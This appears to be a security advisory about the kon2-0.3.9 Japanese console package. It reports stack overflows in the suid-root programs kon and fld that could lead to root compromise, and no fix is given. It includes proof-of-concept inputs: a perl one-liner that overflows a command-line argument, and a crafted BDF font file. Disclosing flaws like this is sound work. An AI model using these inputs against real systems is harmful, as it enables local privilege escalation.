COMMAND

    "kon2" package

SYSTEMS AFFECTED

    kon2-0.3.9

PROBLEM

    Chris Evans  found following  in "kon2"  package -  a program  for
    displaying Japanese on the console.  In the version Chris  briefly
    examined, there were three suid-root execuatbles

        - kon
        - fld
        - newvc

    Here are details of  breakages in "kon" and  "fld".  Both lead  to
    root  compromise,  although  it  wasn't  verified if something has
    dropped root privileges or not at the time of the overflows.

    No discussion of code flaws today, because boring stack  overflows
    are being used

    1) kon
    ======
    kon VGA -StartupMessage `perl -e 'print "A"x10000'`

        => segfault with EIP 0x41414141

    2) fld
    ======
    a) Create file "read.me.and.die", contents:

        CHARSET_REGISTRY"AAAAAAAAAAAAAAAAAAA"
        CHARSET_ENCODING"AAAAAAAAAAAAAAAAAAA"
        CHARSET_ENCODING"AAAAAAAAAAAAAAAAAAA"

        ...

    BUT substitute each sequence of A's for 200 A's

    b) fld -t bdf read.me.and.die
    You don't  get a  clean 0x41414141  stacktrace but  that's just  a
    minor  detail,  and  these  things  are  always  circumventable (a
    pointer gets toasted inbetween two char[] buffers on the stack)

SOLUTION

    Nothing yet.